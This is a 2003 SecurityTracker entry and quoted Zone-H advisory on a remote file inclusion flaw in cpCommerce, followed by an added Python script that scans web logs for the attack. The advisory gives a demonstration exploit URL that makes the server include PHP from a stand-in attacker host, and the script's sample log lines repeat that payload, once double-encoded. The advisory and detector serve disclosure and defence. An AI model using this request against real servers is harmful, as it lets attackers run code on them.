cpCommerce Include File Flaw Lets Remote Users Execute Arbitrary Commands on the Target System
SecurityTracker Alert ID: 1007957
SecurityTracker URL: http://securitytracker.com/id/1007957
CVE Reference: GENERIC-MAP-NOMATCH
Date: Oct 20 2003
Impact: Execution of arbitrary code via network, User access via network
Vendor Confirmed: Yes
Exploit Included: Yes
Version(s): 0.05f
Description:
Zone-H reported an include file vulnerability in cpCommerce. A remote user can execute arbitrary commands on the target server.
The _functions.php file includes files whose names are built from the $prefix variable. A remote user can supply a remote location in $prefix to make the server include and execute arbitrary files.
A demonstration exploit URL is provided:
http://[target]/path_of_cpcommerce/_functions.php?prefix=http://[attacker]/index
PHP code, including operating system commands, in the remote file will be executed on the target system. The code will run with the privileges of the target web server process.
Impact:
A remote user can execute arbitrary PHP code, including operating system commands, on the target system with the privileges of the target web server.
Solution:
No solution was available at the time of this entry.
The vendor had reportedly issued a fix at the following URL, but at the time of this entry, the vendor had retracted the fix as well as the entire web site:
http://cpcommerce.org/forums/index.php?board=2;action=display;threadid=864
Vendor URL: cpcommerce.org/forums/index.php?board=2;action=display;threadid=864
Cause: Input validation error
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
Message History: None.
Source Message Contents
Date: Sun, 19 Oct 2003 12:11:17 +0200
Subject: ZH2003-31SA (security advisory): file inclusion vulnerability in
ZH2003-31SA (security advisory): file inclusion vulnerability in cpCommerce
Published: 19 October 2003
Name: cpCommerce
Affected Versions: 0.05f (and other versions?)
Vendor: http://www.cpcommerce.org
Issue: file inclusion vulnerability
Author: Astharot (at Zone-H.org)
Description
**********
Zone-H Security Team has discovered a flaw in cpCommerce. cpCommerce "is an
open-source e-commerce solution that is entirely template and module based.".
Details
**********
There's a file inclusion vulnerability in the _functions.php file, lines 13-14:
require_once("{$prefix}_config.php");
require_once("{$prefix}_gateways.php");
It is possible for a remote attacker to include an external file and execute
arbitrary commands with the privileges of the webserver (nobody by default).
To test the vulnerability try this:
http://www.vulnsite.com/path_of_cpcommerce/_functions.php?prefix=http://www.attacker.com/index
In this way the file "http://www.attacker.com/index_config.php" or
"http://www.attacker.com/index_gateways.php" will be included and executed on
the server.
Solution
**********
The author has been contacted and he published a temporary fix in the cpCommerce
website forum, waiting for the new version.
The patch is available here:
http://cpcommerce.org/forums/index.php?board=2;action=display;threadid=864.
Suggestions
**********
Fix the script with the patch proposed by the author.
Link to original article here:
http://www.zone-h.org/en/advisories/read/id=3284/
Astharot - Zone-H Admin
--
http://www.zone-h.org - astharot@zone-h.org
PGP Key: http://www.gife.org/astharot.asc
Linux User #292132
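
The request pattern described in this entry can be searched for in web server access logs. The following Python example is added here and is not part of the SecurityTracker entry or the Zone-H advisory; it goes beyond the single URL shown above by also catching percent-encoded and double-encoded values and by flagging other URL-valued parameters at lower severity. It assumes Apache Combined Log Format; the log lines, the /shop/ path and the attacker.example and shop.example hosts are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Combined Log Format: client, timestamp, request target, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+)[^"]*" (\d{3})')
# Remote schemes PHP include/require can fetch from when URL wrappers are enabled.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "ftps://")

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding so %253A%252F%252F is seen as '://'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_remote_includes(lines, script="_functions.php", param="prefix"):
    """Return one finding per query parameter whose value is a remote URL."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parsable access-log line
        client, when, target, status = m.groups()
        url = urlsplit(target)
        for name, raw in parse_qsl(url.query, keep_blank_values=True):
            value = fully_decode(raw).strip()
            if not value.lower().startswith(REMOTE_SCHEMES):
                continue
            # The advisory's exact script and parameter rate "high"; any other
            # URL-valued parameter (e.g. a redirect target) only needs review.
            exact = url.path.endswith("/" + script) and name == param
            findings.append({"client": client, "time": when, "param": name,
                             "value": value, "status": int(status),
                             "severity": "high" if exact else "review"})
    return findings

# Constructed sample log lines (documentation IPs and .example hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Oct/2003:10:01:02 +0200] "GET /shop/index.php?page=1 HTTP/1.0" 200 5120 "-" "-"',
    '203.0.113.7 - - [20/Oct/2003:10:02:11 +0200] "GET /shop/_functions.php?prefix=http://attacker.example/index HTTP/1.0" 200 312 "-" "-"',
    '203.0.113.7 - - [20/Oct/2003:10:02:40 +0200] "GET /shop/_functions.php?prefix=http%253A%252F%252Fattacker.example%252Findex HTTP/1.0" 200 312 "-" "-"',
    '198.51.100.4 - - [20/Oct/2003:10:03:05 +0200] "GET /shop/login.php?return=HTTP://shop.example/cart HTTP/1.0" 302 0 "-" "-"',
]

if __name__ == "__main__":
    for f in find_remote_includes(SAMPLE_LOG):
        print(f["severity"], f["client"], f["param"], f["value"], f["status"])
```

A "high" finding with a 200 status means the script was reached with a remote prefix; whether the include actually ran has to be confirmed from the server side, for example from outbound connections made by the web server process.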